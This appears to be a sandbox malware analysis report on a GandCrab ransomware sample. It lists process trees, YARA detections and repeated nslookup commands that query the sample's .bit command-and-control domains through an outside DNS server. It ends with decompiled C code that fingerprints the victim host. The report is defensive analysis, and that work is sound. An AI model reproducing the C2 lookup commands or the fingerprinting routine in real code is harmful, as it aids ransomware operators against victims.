Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5400, Parent PID: 4500

General

Target ID:	9
Start time:	23:48:50
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: qvvfpl.exePID: 3252, Parent PID: 3452

General

Target ID:	11
Start time:	23:48:52
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"
Imagebase:	0xd70000
File size:	75264 bytes
MD5 hash:	E5E0C9F951E9947AEA55720B7D0299F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000B.00000000.290444735.0000000000D79000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: Joe Security Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 492, Parent PID: 5400

General

Target ID:	12
Start time:	23:48:54
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5732, Parent PID: 4500

General

Target ID:	13
Start time:	23:48:55
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5964, Parent PID: 5732

General

Target ID:	15
Start time:	23:48:56
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4788, Parent PID: 4500

General

Target ID:	20
Start time:	23:48:58
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3572, Parent PID: 4788

General

Target ID:	21
Start time:	23:48:58
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5276, Parent PID: 4500

General

Target ID:	22
Start time:	23:49:01
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5380, Parent PID: 5276

General

Target ID:	23
Start time:	23:49:01
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: qvvfpl.exePID: 68, Parent PID: 3452

General

Target ID:	24
Start time:	23:49:02
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"
Imagebase:	0xd70000
File size:	75264 bytes
MD5 hash:	E5E0C9F951E9947AEA55720B7D0299F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000018.00000002.311448565.0000000000D79000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000018.00000000.308301094.0000000000D79000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6148, Parent PID: 4500

General

Target ID:	25
Start time:	23:49:02
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6168, Parent PID: 6148

General

Target ID:	26
Start time:	23:49:03
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6220, Parent PID: 4500

General

Target ID:	28
Start time:	23:49:04
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6260, Parent PID: 6220

General

Target ID:	29
Start time:	23:49:04
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6316, Parent PID: 4500

General

Target ID:	30
Start time:	23:49:06
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6324, Parent PID: 6316

General

Target ID:	31
Start time:	23:49:06
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6372, Parent PID: 4500

General

Target ID:	32
Start time:	23:49:08
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6380, Parent PID: 6372

General

Target ID:	33
Start time:	23:49:09
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6528, Parent PID: 4500

General

Target ID:	35
Start time:	23:49:13
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6540, Parent PID: 6528

General

Target ID:	36
Start time:	23:49:14
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6632, Parent PID: 4500

General

Target ID:	37
Start time:	23:49:16
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6640, Parent PID: 6632

General

Target ID:	38
Start time:	23:49:16
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6720, Parent PID: 4500

General

Target ID:	39
Start time:	23:49:17
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6736, Parent PID: 6720

General

Target ID:	40
Start time:	23:49:18
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6808, Parent PID: 4500

General

Target ID:	41
Start time:	23:49:20
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6820, Parent PID: 6808

General

Target ID:	42
Start time:	23:49:20
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6920, Parent PID: 4500

General

Target ID:	43
Start time:	23:49:21
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6932, Parent PID: 6920

General

Target ID:	44
Start time:	23:49:22
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 7028, Parent PID: 4500

General

Target ID:	45
Start time:	23:49:23
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7040, Parent PID: 7028

General

Target ID:	46
Start time:	23:49:23
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 7100, Parent PID: 4500

General

Target ID:	47
Start time:	23:49:25
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7108, Parent PID: 7100

General

Target ID:	48
Start time:	23:49:25
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 7156, Parent PID: 4500

General

Target ID:	49
Start time:	23:49:27
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7164, Parent PID: 7156

General

Target ID:	50
Start time:	23:49:28
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6164, Parent PID: 4500

General

Target ID:	51
Start time:	23:49:34
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6156, Parent PID: 6164

General

Target ID:	52
Start time:	23:49:34
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6288, Parent PID: 4500

General

Target ID:	53
Start time:	23:49:38
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6260, Parent PID: 6288

General

Target ID:	54
Start time:	23:49:38
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 2852, Parent PID: 4500

General

Target ID:	56
Start time:	23:49:39
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1432, Parent PID: 2852

General

Target ID:	57
Start time:	23:49:40
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 2408, Parent PID: 4500

General

Target ID:	58
Start time:	23:49:43
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6448, Parent PID: 2408

General

Target ID:	59
Start time:	23:49:43
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6392, Parent PID: 4500

General

Target ID:	61
Start time:	23:49:46
Start date:	31/08/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0xb80000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6428, Parent PID: 6392

General

Target ID:	62
Start time:	23:49:47
Start date:	31/08/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: eW1QrimJYd.exePID: 4500, Parent PID: 5436COMMON

Execution Graph

Execution Coverage:	32%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.6%
Total number of Nodes:	711
Total number of Limit Nodes:	16

Executed Functions

Function 00A86D90 Relevance: 156.3, APIs: 62, Strings: 27, Instructions: 551
registrymemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00A86D90(char* __ecx) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				int _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t182;
				long _t183;
				WCHAR* _t185;
				short _t186;
				short _t187;
				short _t188;
				signed int _t189;
				signed int _t192;
				signed int _t194;
				int _t206;
				void* _t209;
				signed int _t211;
				signed int _t214;
				WCHAR* _t218;
				WCHAR* _t219;
				long _t228;
				_Unknown_base(*)()* _t233;
				long _t242;
				signed int _t245;
				intOrPtr _t250;
				WCHAR* _t252;
				WCHAR* _t254;
				long _t256;
				long _t260;
				void* _t263;
				WCHAR* _t265;
				long _t268;
				WCHAR* _t269;
				long _t273;
				void* _t278;
				long _t280;
				long _t283;
				WCHAR* _t286;
				void* _t287;
				WCHAR* _t289;
				WCHAR* _t290;
				WCHAR* _t292;
				DWORD* _t296;
				char* _t300;
				short* _t301;
				DWORD* _t307;
				signed int _t310;
				void* _t314;
				char* _t316;
				char* _t318;
				void* _t319;
				void* _t320;

				_t300 = __ecx;
				_t318 = __ecx;
				if( *__ecx != 0) {
					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t300 =  &_v28;
					 *(_t318 + 8) = _t292;
					_v28 = 0x100;
					GetUserNameW(_t292, _t300); // executed
				}
				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
					_v28 = 0x1e;
					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t300 =  &_v28;
					 *(_t318 + 0x14) = _t290;
					GetComputerNameW(_t290, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
					L11:
					if( *(_t318 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
							L35:
							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
								L42:
								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
									L51:
									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
										_v32 = 0;
										_t250 = E00A87520(_t318 + 0x2c,  &_v32); // executed
										if(_t250 == 0) {
											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
										}
									}
									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x68) = _t218;
										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
										_v16 = _t219;
										_t81 =  &(_t219[0x306]); // 0x60c
										_v8 = _t81;
										GetWindowsDirectoryW(_t219, 0x100);
										_t300 = _v16;
										_t300[6] = 0;
										_t85 =  &(_t300[0x600]); // 0x600
										_t307 = _t85;
										_t86 =  &(_t300[0x400]); // 0x400
										_v20 = _t307;
										_t88 =  &(_t300[0x604]); // 0x604
										_t89 =  &(_t300[0x608]); // 0x608
										_t90 =  &(_t300[0x200]); // 0x200
										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
										_v24 = 0;
										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
										if(_t228 == 0) {
											_t300 = _v8;
											_v32 = 0x80;
											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
											if(_t242 != 0) {
												GetLastError();
											} else {
												_v24 = 1;
											}
											RegCloseKey(_v28); // executed
											if(_v24 != 0) {
												_t245 = lstrlenW(_v8);
												_t300 = _v8;
												_push(_t300);
												E00A86D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
											}
										}
										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
										_t320 = _t320 + 0xc;
										lstrcatW( *(_t318 + 0x68), _v8);
										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
										_v32 = _t233;
										if(_t233 == 0) {
											 *(_t318 + 0x6c) = 0;
										} else {
											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
										}
										 *(_t318 + 0x70) =  *_v20;
										VirtualFree(_v16, 0, 0x8000); // executed
									}
									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
										L78:
										if( *(_t318 + 0x80) == 0) {
											L83:
											return 1;
										}
										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
										 *(_t318 + 0x84) = _t182;
										if(_t182 == 0) {
											L82:
											 *(_t318 + 0x80) = 0;
											goto L83;
										}
										_push(_t300);
										_t183 = E00A868F0(_t182); // executed
										if(_t183 != 0) {
											goto L83;
										}
										VirtualFree( *(_t318 + 0x84), _t183, 0x8000); // executed
										goto L82;
									} else {
										_v68 = L"UNKNOWN";
										_v64 = L"NO_ROOT_DIR";
										_v60 = L"REMOVABLE";
										_v56 = L"FIXED";
										_v52 = L"REMOTE";
										_v48 = L"CDROM";
										_v44 = L"RAMDISK";
										_t185 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x7c) = _t185;
										_t301 =  &_v132;
										_t186 = 0x41;
										do {
											 *_t301 = _t186;
											_t301 = _t301 + 2;
											_t186 = _t186 + 1;
										} while (_t186 <= 0x5a);
										_t187 =  *L"?:\\"; // 0x3a003f
										_v40 = _t187;
										_t188 =  *0xa8e308; // 0x5c
										_v36 = _t188;
										_t189 = 0;
										_v28 = 0;
										do {
											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
											_t192 = GetDriveTypeW( &_v40); // executed
											_t310 = _t192;
											if(_t310 > 2 && _t310 != 5) {
												_v36 = 0;
